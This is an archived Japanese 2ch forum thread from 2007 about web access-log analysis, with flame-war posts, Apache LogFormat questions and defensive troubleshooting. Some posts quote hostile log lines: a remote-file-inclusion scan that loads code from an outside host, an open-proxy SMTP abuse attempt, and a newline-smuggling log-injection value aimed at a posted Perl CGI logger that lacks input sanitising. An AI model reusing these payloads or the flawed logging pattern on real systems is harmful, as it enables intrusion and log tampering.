★何が言いたいかよく分からない事
★2ch初心者

924 :DNS未登録さん:2007/04/17(火) 23:47:55 ID:9QIypaM5
>>923は、何故そんなに否定的なのか良く分からないが、何か都合悪いのか?
まあ、否定的な人程、相手の言葉分からないって言うのは定番だしね!

大体、PHSだけでPRIN使う訳無いでしょ?
まあ、良く解析データ見てみよう!

925 :DNS未登録さん:2007/04/17(火) 23:56:50 ID:???
>>924
君の文章は人に何かを伝える文じゃ無い。
日記ならチラシの裏へでもどうぞ。

926 :DNS未登録さん:2007/04/18(水) 00:04:52 ID:7Ww0E7RB
日記?是が?大体日記チラシの裏に書くか?
其れより、アクセス解析の話出来ないなら、もう来なくて良いよ!

927 :925様:2007/04/18(水) 00:20:00 ID:???
>>926
じゃ仮にUAを信じるとして、なんでPCだと
断定出来るのか根拠を教えてください。

928 :925様:2007/04/18(水) 00:21:02 ID:???
ごめん、どう考えても釣りだなこれはw
見事に釣られたわw

929 :DNS未登録さん:2007/04/18(水) 00:28:15 ID:7Ww0E7RB
HTTP_USER_AGENTMozilla/4.0 (compatible; MSIE 6.0; KYOCERA/AH-K3001V/1.8.3.72.000000/0.1) Opera 7.0 [ja]
国/言語?
REMOTE_HOSTp125028008232.ppp.prin.ne.jp
Proxy情報△
Proxy関連情報
CACHE-CONTROL:max-age=43200

先ず、是!この京セラAH-K3001VはPCにダウンロードしてみた。且つ、Operaじゃ無いと起動しないソフトだと分かった。
尚、Operaもダウンロードしてテストした。尚、willcomのPRINのプロパイダーである事からもPC以外無いと言えよう。


930 :DNS未登録さん:2007/04/18(水) 00:51:08 ID:nyfpTYv2
さわんじゃね

931 :DNS未登録さん:2007/04/18(水) 01:54:36 ID:???







                だ か ら
                        そ れ で
                                い っ た い

              な  に  が  い  い  た  い  ん  だ  ?

932 :DNS未登録さん:2007/04/18(水) 02:18:32 ID:sclDv9OX
良く観て見よう!pppサーバー経由の為、プロシキのデータが在るね!しかも一度に何回串打ちしたか是観て分かるかな?インターネットエクスプローラー経由で京セラソフト使ってOpera立ち上げてる訳だから、PCなのは間違い無いが、OSはwindowsの可能性高いね!

933 :DNS未登録さん:2007/04/18(水) 02:28:17 ID:???
     ,..).、__
 ..,,_ .イ:::・:(< カァー
 !:::::`'::::::::!ソ
 `>:::::ノ
  く/ゝゝ

934 :DNS未登録さん:2007/04/18(水) 02:41:28 ID:???
DQNが紛れ込んでるな

935 :DNS未登録さん:2007/04/18(水) 02:45:42 ID:???
最初の書き込みが恥ずかしかったんだろ

936 :DNS未登録さん:2007/04/18(水) 03:11:22 ID:sclDv9OX
>>935自演か?
http://m-pe.tv/u/page.php?uid=gajmgapg&id=1

2007/04/16 0:09:23
ページページ001
ページ回数1 サイト回数1 前回? 初回?
モニタ240 x 320 x 24bit JavaScriptTrue CookieTrue
HTTP_REFERER不詳(ブックマーク等)
HTTP_USER_AGENTMozilla/4.0 (compatible; MSIE 6.0;
KYOCERA/AH-K3001V/1.8.3.72.000000/0.1) Opera 7.0 [ja]
国/言語?
REMOTE_HOSTp125028008232.ppp.prin.ne.jp
Proxy情報△
Proxy関連情報
CACHE-CONTROL:max-age=43200

JavaScriptTrue CookieTrueな訳だから、アクセスデータ不明が多い設定してる訳だね!アクセス解析の話出来無いなら、何しに来たの?


937 :DNS未登録さん:2007/04/18(水) 03:41:30 ID:sclDv9OX
>>935の為に[age]なきゃね♪

アクセス解析の話出来無いなら、もう来無くて良いよ!


938 :DNS未登録さん:2007/04/18(水) 06:16:19 ID:???
認証ユーザごとのアクセス解析レポートが
可能なソフトってありますかね?
たとえば、会員制の限定サイトや有料ページへのアクセスを、
認証ユーザごとに集計したいときなんかみなさんどうしていますか?

939 :DNS未登録さん:2007/04/18(水) 10:29:55 ID:???
>>938
webalizerなんかでもユーザの集計出るよ。
まぁ機能不足だけど、一応。

940 :DNS未登録さん:2007/04/18(水) 10:30:33 ID:???
帝国データバンクのリモートホストって何?

941 :DNS未登録さん:2007/04/18(水) 22:36:37 ID:???
>>940
アホか。

942 :DNS未登録さん:2007/04/18(水) 22:57:58 ID:???
gatekeeper.teikoku-deeta-banku.com

943 :DNS未登録さん:2007/04/19(木) 09:07:49 ID:???
以前からリファラースパム目的のアクセスがきてて
リファラーのURLが必ず「#」で終わるという特徴があったので
これで判別して処理してたんだが、数日前から「#」が消えた。
あまりの間抜けさにさすがに気付いたのかな。

944 :DNS未登録さん:2007/04/19(木) 10:01:19 ID:???
gate01.asia.delta.bank.com

945 :バッカーです ◆KeuXjwWDdE :2007/04/19(木) 18:04:07 ID:???
しばらく見なかったけど
プリン厨が自暴自棄になってたんだねw

946 :DNS未登録さん:2007/05/27(日) 21:12:15 ID:JXV/1uLk
66.235.180.186 - - [27/May/2007:20:24:09 +0900] "GET /index.php?page=http://web.hacker.dj/1?&/ HTTP/1.1" 403 276 "-" "Morfeus Fucking Scanner"

こんなのが大量にログに。
66.235.180.186 はwebサーバーをたてているらしい
ttp://www.alltestequipment.com

やり返したらまずいよね?

947 :バッカーです ◆KeuXjwWDdE :2007/05/28(月) 14:40:14 ID:???
まずい

948 :DNS未登録さん:2007/05/29(火) 00:39:00 ID:???
バッカーは聞き流して。次いこうか。

949 :DNS未登録さん:2007/06/13(水) 21:14:31 ID:???
>>582
すっげー亀レス

本物ですた
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)

システムソフトウェア バージョン3.50の実機で試した。


950 :DNS未登録さん:2007/06/14(木) 19:40:40 ID:PMXXZwqJ
いや、だからUAをいじってるだけなんじゃないか?

951 :DNS未登録さん:2007/07/03(火) 13:36:39 ID:jcOBbcyF
172.163.17.229 "CONNECT mx2.mail.yahoo.com:25 HTTP/1.0" 405 235 "-" "-"
172.163.17.229 "POST http://172.163.17.229:25/ HTTP/1.1" 200 44 "-" "-"

上は弾いているようなのですが、下が200・・・やっぱり不味いんでしょうか
メールがらみで悪さしてるのはわかるのですが、

一体なにをしているのか
そして、どういう対策を採ればよいのか

がよくわかりませぬ

952 :DNS未登録さん:2007/07/03(火) 13:40:12 ID:???
外から使える串になってなければ無視しておk

953 :DNS未登録さん:2007/07/03(火) 13:47:36 ID:???
ありがとうございます
上は以前は200だったので、色々頑張って使えないようにしたのですが、
下は一体なにをしようとしているのか、ちとわからないので不気味なのです
後学のためにも、誰かわかるかたいたら教えてくださいませ!

954 :DNS未登録さん:2007/07/03(火) 17:17:30 ID:???
>>951
mod_proxyが動作していないのなら問題はない。
上記のPOSTコマンドは自前のWebサーバのルートディレクトリにPOSTされてるだけ。
(仮想ホストが設定されていればデフォルトの仮想ホスト)

955 :DNS未登録さん:2007/07/05(木) 18:24:33 ID:???
閲覧開始ページと離脱ページってどうやって取得するんでしょうか?
同一IPからの最後のアクセスから30分以上アクセスがなかったら
そのページが離脱ページってこと?

956 :DNS未登録さん:2007/07/05(木) 18:34:22 ID:???
>>955
ここから始まった、終わったってのをブラウザが通知してくれるわけでもないんで、
同一人物と思われるアクセス (IPアドレスとかクッキーとかで判断して) の
始まりっぽいところと終わりっぽいところを見るしかないでしょうね。
でも終わったと思ったら3時間後にアクセスが・・・とかいうのは判断に困るね。

957 :DNS未登録さん:2007/07/05(木) 21:45:15 ID:???
ここから始まった、はリファラで判断出来るかも?

958 :バッカーです ◆KeuXjwWDdE :2007/07/07(土) 02:49:39 ID:???
IPアドレスgrepして最初と終わりだけ見ればいいんじゃないかな?
他人で重複IPとか、同一個人で複数回アクセスとか
誤差の範囲だと思うし。
日にまたがったアクセスは注意が必要だと思うけど。

959 :DNS未登録さん:2007/07/07(土) 09:24:39 ID:???
>>958
固定回線の個人限定であればそれでもいいだろうが、
企業ユーザや携帯電話など、proxy経由のアクセスを考えたらそれでは意味がない。

960 :バッカーです ◆KeuXjwWDdE :2007/07/07(土) 14:28:52 ID:???
だから誤算の範囲じゃないの?
気になるならUAで分ければいいだけだし


961 :DNS未登録さん:2007/07/07(土) 18:36:25 ID:???
女も座って食べるジェントルマン、バッカーです。

962 :バッカーです ◆KeuXjwWDdE :2007/07/08(日) 01:59:34 ID:???
紳士的にエレガントにいきましょう

963 :DNS未登録さん:2007/07/08(日) 06:38:45 ID:???
>960
企業内ネットワーク、特に大企業のネットワークを知らないとわからないのは仕方が無い。
1台のプロキシを数千人が使っているなんてのは普通なんだな。NATを使わない理由は、
プロキシのログで社員の行動を監視できるからなんだな。もちろんそれで完璧ではない
事ぐらいはわかっている。でもお偉いさんにばれるとまた余計な制限を入れられるので、
誰もそんな事は言わないんだな。

漏れは研究所勤務だから制限は緩いけど、事業部だと「このページは業務に関係ありません」
と警告がくるそうだ。2ちゃんねるならそれでも良いけど、プログラミングなどの情報が豊富
な個人ページまで制限されている事があるらしい。


964 :DNS未登録さん:2007/07/08(日) 06:41:10 ID:???
>>963
F2?

965 :DNS未登録さん:2007/07/08(日) 14:00:07 ID:???
>>963
ニートのバッカーに言ったところで無駄だよ。

966 :DNS未登録さん:2007/07/08(日) 18:57:29 ID:???
>>963
でもね、そういうシステムを導入している大企業に勤めていて、
かつ個人サイトを運営している立場から言わせてもらうなら、
そんな大企業からの(=勤務中の)アクセスが全体に占める割合は
やっぱり誤差の範囲内だよ。
ま、運営しているサイトの内容にもよるだろうけどね。

ただ、ケータイキャリアのプロキシは、近い将来、
割合として無視できなくなるだろうとは思う。

967 :DNS未登録さん:2007/07/08(日) 20:35:51 ID:???
>>966
もうお前は負けたんだから、わざわざ匿名にして傷を広げんでも。

968 :966:2007/07/08(日) 20:55:08 ID:???
自分に都合が悪い意見が出てきたら自演だと思い込むことで精神のバランスを保ってる奴って哀れだなあ

969 :DNS未登録さん:2007/07/09(月) 15:47:26 ID:???
ログでエージェント情報の後に

"Apache=111.222.333.444.123456789789"

このような記述が書かれているのですが、これは何の情報なのでしょうか?
わかる方お願いします。

970 :DNS未登録さん:2007/07/09(月) 15:50:42 ID:???
>>969?略さず書け。

971 :969:2007/07/09(月) 18:08:33 ID:???
形式的にはこのような形です

11.22.333.444 ???.????.???.jp - [15/May/2007:01:06:41 +0900]
"GET /images/top.jpg HTTP/1.1" 200 2622
"http://www.????.??????.???.jp/" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
"Apache=111.222.333.444.123456789789"


972 :DNS未登録さん:2007/07/09(月) 19:35:34 ID:???
>>971
Apacheのcombinedログのようだが、httpd.confのLogFormatで何か設定してないか?
少なくともデフォルトのhttpd.confではUser Agentの後はそれ以上なにも書かれてない。

973 :DNS未登録さん:2007/07/09(月) 19:45:49 ID:???
mod_usertrackとでも組み合わせてCookieのApacheの値でも拾うように
LogFormatを設定してあるんじゃね?

974 :969:2007/07/09(月) 23:22:20 ID:???
>>972-973
どうもありがとうございます
貰ったログなのですが、普段見ない記述でWeb等でも紹介されていなかったので聞いてみました
お二人の意見を参考にもう少し調べてみることにします

975 :DNS未登録さん:2007/07/10(火) 06:01:08 ID:???
確かにアクセスされているのに、アクセスログに残らないことはあるのでしょうか?
CGI出力のログに残っているIPのうち半分も残っていなのですが……

976 :DNS未登録さん:2007/07/10(火) 11:12:30 ID:???
>>975
ありえん。エラーログを確認すれ。

977 :バッカーです ◆KeuXjwWDdE :2007/07/10(火) 16:24:45 ID:???
>>967
負けただってw

>>966
だな
で、オレと勘違いされた気分はどうだ?
一応昨日はシャワー浴びないで寝た
このムレムレ感もぜひとも味わってほしい

978 :DNS未登録さん:2007/07/10(火) 16:39:51 ID:???
ジェントルマンは風呂入れよ。

979 :DNS未登録さん:2007/07/10(火) 17:28:43 ID:???
>>976
やはりそうなのですか……
エラーログにはfavicon.icoぐらいしか残ってないです。

CGI2行目にログ出力いれてるので出力内容がおかしくなるとは思えないんだけどなあ

980 :DNS未登録さん:2007/07/10(火) 17:39:48 ID:???
>>979
HTTPサーバのログが少ないのか、CGIが吐くログが少ないのか、どっち?

981 :DNS未登録さん:2007/07/10(火) 17:46:51 ID:Iw/UdQC8
>>980
HTTPサーバーが吐く方が少ないです
何人かからCGIにアクセスできないとの報告があったので調査してみたらこうなっていました

982 :DNS未登録さん:2007/07/10(火) 17:48:23 ID:???
sage忘れた…
ごめんなさいー

983 :DNS未登録さん:2007/07/10(火) 19:12:59 ID:???
>>975
>CGI出力のログに残っているIPのうち半分も残っていなのですが……

ということは、ログのエントリ数は足らないわけじゃないが
記録されているIPアドレスの数が少ない、ってことか?
Apacheのログは、同一IPアドレスでも名前解決していたり
していなかったりすることがあるから、それじゃないの?

984 :DNS未登録さん:2007/07/10(火) 19:35:01 ID:???
>>983
いえ、エントリ数も同じくかけてます
というより特定のIPだけが残っていないようなのですが……

985 :DNS未登録さん:2007/07/10(火) 20:56:46 ID:???
CGIのバグで余計なログを生成している、という可能性は?

986 :DNS未登録さん:2007/07/10(火) 21:59:24 ID:???
>>985
たぶんないかとおもいます。
排他処理していないのでCGIの方が少ないということのならわかるのですが、
CGIの方が多いので明らかにおかしいと思うのですが……

念のため先頭6行晒しておきます
#!/usr/bin/perl
$addr = $ENV{'REMOTE_ADDR'};
open(LOG,">>log8893.txt");
print LOG $addr,$ENV{'QUERY_STRING'},"\n";
close(LOG);

987 :DNS未登録さん:2007/07/11(水) 11:57:20 ID:???
>>986
この構造だとQUERY_STRINGにコントロールコードが紛れ込んでも
そのまま処理されちゃうよな。

QUERY_STRING="parm1=data1&parm2=data2\n192.168.1.1 parm1=data1&parm2=data2"
のように不正アクセスされてるのでは。

988 :DNS未登録さん:2007/07/11(水) 21:50:44 ID:???
>>987
あぁなるほど
でも公開してるわけでもないのにそんなことをする人って……

試しに\nを消去する処理はさんで様子を見てみます、色々とありがとうございましたー

241 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)